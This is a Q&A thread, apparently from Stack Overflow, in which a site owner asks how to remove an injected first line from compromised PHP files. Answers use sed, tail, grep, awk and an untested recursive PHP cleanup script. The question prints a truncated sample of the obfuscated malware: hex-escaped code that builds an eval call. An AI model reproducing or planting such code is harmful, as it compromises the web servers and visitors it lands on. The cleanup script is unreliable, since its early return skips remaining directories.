# sed remove from php first line

Tags: sed, malware

I got hacked in my shared hosts. All php files has this kind of code in directory. My bet is that I have old WordPress installations that has put some malware int web directory. Shame on me when I didn't remove those. Now I have 2 active websites wich has malware on, and I don't have backups. All malware files is on the first line `<?php ........ ?>` Now I need to remove that. I tried [Remove the first line with sed with a regular expression](https://stackoverflow.com/questions/14853321/remove-the-first-line-with-sed-with-a-regular-expression) but it didn't help. It didn't remove anything.

```
<?php $xmrcycpmjf= 6767~6<Cw6<pd%x5c%x7825w6Z6<.57825mm)%x5c%x7825%x5c%x7878:-.........!%x5c%x7825tzw%x5x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c25h>#]y31]278]y35\141\x70\146\x66\153\x74\154\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x34\55\x31\71\x37\51\x29\54\x20\143\x68\162\x28\50\x35\65\x35\55\x34\66\x33\51\x29\54\x20\171\x79\166\x6f\151\x6b\157\x68\157\x68\50\x24\143\x6d\142\x78\170\x61\153\x63\144\x6e\54\x24\170\x6d\162\x63\171\x63\160\x6d\152\x66\51\x29\51\x3b\40\x2f\52\x20\157\x73\144\x6f\167\x6d\150\x72\145\x7a\40\x2a\57\x20"; $vmdcgfyvud=substr($xmrcycpmjf,(39882-29769),(52-40)); $vmdcgfyvud($efppuciabz, $ucpqtjetra, NULL);...... $vmdcgfyvud=$ucpqtjetra; $vmdcgfyvud=(409-288); $xmrcycpmjf=$vmdcgfyvud-1; ?><?php echo "test"?>
```

and I want it to look like this

```
<?php echo "test"?>
```

Comment: Is the real code on the next line?

Comment: try `sed '1s/^.*$/<?php echo "test"?>/g' file`

Answer (score 0, accepted):

Just try this simple sed command,

```
sed '1s/.*\(<.*\)$/\1/g' file
```

OR

```
sed '1s/.*</</g' file
```

Comment: Thank you this helped. Awesome help guys... I didn't get any notice on email. Would have answered quicker. [n00b]

Answer (score 0):

Instead of using `sed`, you could use `tail`:

```
tail -n +2 file > output
mv output file
```

`tail` simply ignores the first line and the other lines are simply echoed.

---

Or you could use something like `grep` with the `-v` flag to *ignore* that line:

```
grep -v -F '<?php $xmrcycpmjf= 6767~6<Cw6<pd%x5c%x7825w6Z6<.57825mm)%x5c%x782...' < file
```

Answer (score 0):

Would this do?

```
awk -F"<" '{print FS$NF}' file
<?php echo "test"?>
```

Comment: if you're unsure if an answer is suiting OPs needs, first clarify you understand his needs by asking appropriate comments. Answers aren't meant to include *any* questions, that's the main difference between *an answer* and *a question*.

Answer (score 0):

In assumption that the Malware is always contained in the first(!) php block you could use this regex

```
^(<\?php)(.*?)(\?>)
```

To remove the first PHP Block run recursively trough every file and replace the first match with an empty string.

For example with PHP

```
<?php
//Save as clean.php
function cleanup($dir) {
$dirh = opendir($dir);

if ($dirh) {
    while (($file = readdir($dirh)) !== false) {
        $file_path = $dir . "/" . $file;

        if(is_file($file_path)){
            $info = pathinfo($file_path);

            if($info['extension'] === "php" && $info['basename'] != "clean.php"){
                file_put_contents($file_path, preg_replace('/^(<\?php)(.*?)(\?>)/', '', file_get_contents($file_path), 1));
            }
        } else if(is_dir($file_path)){
            return cleanup($file_path);
        }

    }

    closedir($dirh);
}
}
cleanup('web'); //Pass the name of infected dir
```

This code is not tested!

Remember to backup everything!